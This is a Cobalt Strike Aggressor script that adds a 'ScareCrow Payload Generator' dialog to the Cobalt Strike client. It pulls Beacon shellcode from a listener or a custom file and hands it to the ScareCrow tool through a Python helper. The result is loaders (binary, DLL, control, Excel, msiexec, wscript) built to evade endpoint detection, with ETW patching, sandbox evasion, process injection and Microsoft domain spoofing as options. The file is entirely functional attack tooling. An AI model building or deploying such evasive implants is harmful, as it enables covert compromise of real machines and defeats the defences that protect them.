############################################################
# Please do not use / at the end of the directories!
############################################################
#Path to the ScareCrow-CobaltStrike repository you just cloned.
$script_path = "/home/user/ScareCrow-CobaltStrike";
#Path to the compiled ScareCrow Go executable of the installation.
$scarecrow_executable = "/home/user/ScareCrow-CobaltStrike/ScareCrow/ScareCrow";
#Path to the CobaltStrike directory.
$cs_directory = "/home/user/cobaltstrike";
#Path to the python3 binary.
$python3 = "/usr/bin/python3";
############################################################

$loader = "";
$domain = "";
$etw = "";
$sandbox = "";
$custom_bin = "";
$loader_name = "";
$shellcode = "";
$injection = "";

menubar("ScareCrow", "scare_crow");

popup scare_crow {
    item "&Generate Payload" {
        ScareCrow();
    }
}

sub ScareCrow {
    local('$dialog %defaults');
    %defaults["domain"] = "www.microsoft.com";

    $dialog = dialog("ScareCrow Payload Generator (S)", %defaults, &mainCallback);
    dialog_description($dialog, "Generate EDR evasion payloads. (#) for optional, (*) for required options.");
    drow_listener_stage($dialog, "listener", "(*) Listener: ");
    drow_file($dialog, "custom_binary", "(#) Custom x64 Shellcode: ");
    drow_combobox($dialog, "payload_type", "(*) Payload Type: ", @("Stageless"));
    drow_combobox($dialog, "architecture", "(*) Architecture: ", @("x64"));
    drow_combobox($dialog, "loader", "(*) Loader: ", @("binary", "control", "dll", "excel", "msiexec", "wscript"));
    drow_checkbox($dialog, "etw", "(#) Disable ETW patching (enabled by default)");
    drow_checkbox($dialog, "sandbox", "(#) Sandbox evasion");
    drow_text($dialog, "injection", "(#) Process Injection: ");
    drow_text($dialog, "domain", "(*) Domain: ");
    dbutton_action($dialog, "Generate Payload");
    dbutton_help($dialog, "https://github.com/GeorgePatsias/ScareCrow-CobaltStrike");
    dialog_show($dialog);
}

sub loaderDialog {
    local('$dialog %defaults');

    $dialog = dialog("ScareCrow Payload Generator (S)", %defaults, &loaderDialogCallback);
    dialog_description($dialog, "Specify JScript loader name for the payload e.g. Loader.js - (**Optional For Control payloads)");
    drow_text($dialog, "loader_name", "Loader name: ");
    dbutton_action($dialog, "Generate");
    dbutton_help($dialog, "https://github.com/GeorgePatsias/ScareCrow-CobaltStrike");
    dialog_show($dialog);
}

sub loaderDialogCallback {
    $loader_name = $3["loader_name"];
    GeneratePayload();
}

sub mainCallback {
    if ($3["listener"] eq "") {
        show_message("No listener specified!");
        exit();
    }

    $loader = $3["loader"];
    $domain = $3["domain"];
    $etw = $3["etw"];
    $sandbox = $3["sandbox"];
    $custom_bin = $3["custom_binary"];
    $injection = $3["injection"];

    if ($injection ne "" && $etw eq "false"){
        show_message("Cannot use Process Injection and ETW patching together. Disable ETW patching if you want to do a Process Injection");
        exit();
    }

    if ($custom_bin ne ""){   
        $shellcode_file = openf($custom_bin);
        $shellcode = readb($shellcode_file, -1);
        closef($shellcode_file);
    }else{
        $shellcode = artifact_payload($3["listener"], "raw", $3["architecture"]);
    }

    if ($loader eq "binary"){
        GeneratePayload();
    } else if ($loader eq "dll"){
        GeneratePayload();
    }else if ($loader eq "control"){
        loaderDialog();
    }else if ($loader eq "excel"){
        loaderDialog();
    }else if ($loader eq "msiexec"){
        loaderDialog();
    }else if ($loader eq "wscript"){
        loaderDialog();
    }
}

sub GeneratePayload {
    prompt_file_save("scbeacon.bin", {
        show_message("Generating payload, please wait... You can close this dialog while you wait.");

        $handle = openf(">" . $1);
        writeb($handle, $shellcode);
        closef($handle);

        $data = exec($python3 . " " . $script_path . "/Helper.py" . " " . $scarecrow_executable . " " . $1 . " " . $loader . " " . $domain . " " . $cs_directory . " " . $etw . " " . $sandbox . " " . $injection . " " . $loader_name);
        $pythondata = readAll($data);

        show_message("Executable saved to: " . $pythondata);
    });
}

println("\n\c9[+]\o Loaded ScareCrow.cna!");
println("\c8[!]\o \$script_path set to '\U$script_path\U'");
println("\c8[!]\o \$scarecrow_executable set to '\U$scarecrow_executable\U'");
println("\c8[!]\o \$cs_directory set to '\U$cs_directory\U'");
